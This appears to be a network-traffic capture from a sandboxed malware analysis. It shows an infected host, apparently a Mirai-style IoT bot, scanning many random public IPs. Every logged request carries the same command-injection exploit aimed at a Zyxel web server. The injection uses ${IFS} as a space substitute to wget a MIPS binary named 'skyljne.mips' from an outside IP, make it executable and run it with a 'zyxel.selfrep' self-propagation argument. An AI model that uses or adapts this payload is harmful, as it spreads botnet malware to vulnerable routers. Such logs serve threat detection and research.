                                    Jan 13, 2024 19:02:30.078681946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3334192.168.2.1340124114.21.36.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078733921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3335192.168.2.1348498185.247.27.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078797102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3336192.168.2.134361686.231.16.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078871965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3337192.168.2.1340552102.40.128.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078938961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3338192.168.2.134371478.230.46.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.078996897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3339192.168.2.1344782131.212.161.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079040051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3340192.168.2.1333832138.200.61.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079117060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3341192.168.2.1359976102.112.219.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079193115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3342192.168.2.1352246197.96.70.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079252005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3343192.168.2.1347436139.229.13.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079314947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3344192.168.2.1341664203.140.34.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079375029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3345192.168.2.1334626143.158.243.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079407930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3346192.168.2.1358830100.152.116.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079448938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3347192.168.2.13367244.253.50.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079546928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3348192.168.2.1335672147.210.100.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079612017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3349192.168.2.1343872175.28.167.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079626083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3350192.168.2.1360722137.28.24.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079709053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3351192.168.2.1348406179.144.98.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079754114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3352192.168.2.13338662.91.189.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079790115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3353192.168.2.1357426109.74.160.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079839945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3354192.168.2.133927049.44.253.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079941034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3355192.168.2.1360354118.79.50.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.079978943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3356192.168.2.133789268.221.121.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080034018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3357192.168.2.135771085.130.70.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080090046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3358192.168.2.1358510181.235.145.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080152035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3359192.168.2.1357604198.109.211.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080189943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3360192.168.2.133540250.2.165.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080257893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3361192.168.2.1343754124.31.63.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080295086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3362192.168.2.1357588133.233.210.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080360889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3363192.168.2.134822270.29.244.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080390930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3364192.168.2.1357592134.229.34.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080425024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3365192.168.2.1360076181.194.217.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080502987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3366192.168.2.1339684100.234.211.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080543995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3367192.168.2.1339116101.124.172.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080605984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3368192.168.2.1357056171.64.24.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080677032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3369192.168.2.1334538136.194.225.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080732107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3370192.168.2.1345326205.6.123.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080761909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3371192.168.2.1341352199.123.101.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080800056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3372192.168.2.133629471.8.59.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080878019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3373192.168.2.133478062.215.249.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.080941916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3374192.168.2.1350084103.115.159.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081008911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3375192.168.2.134531080.198.5.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081058025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3376192.168.2.1356382163.135.103.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081096888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3377192.168.2.1354764107.134.103.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081192970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3378192.168.2.1360390200.179.19.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081221104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3379192.168.2.134521617.59.72.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081289053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3380192.168.2.134627691.130.215.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081355095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3381192.168.2.1334508143.40.71.52443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081403017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3382192.168.2.1341532201.17.28.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081481934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3383192.168.2.1340162182.125.69.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081492901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3384192.168.2.133406266.221.115.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081537962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3385192.168.2.1352076123.142.246.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081610918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3386192.168.2.134148497.101.72.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081671000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3387192.168.2.1344520111.120.155.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081732988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3388192.168.2.1347460136.67.156.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081810951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3389192.168.2.1335632211.145.242.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081849098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3390192.168.2.135704496.50.115.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081912994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3391192.168.2.135085684.104.89.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.081965923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3392192.168.2.1335960219.165.14.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082010031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3393192.168.2.1347726148.177.165.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082051992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3394192.168.2.1360530223.88.11.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082087040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3395192.168.2.135651254.91.35.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:30.082154989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3396192.168.2.1340516179.0.56.129443
                                    TimestampBytes transferredDirectionData
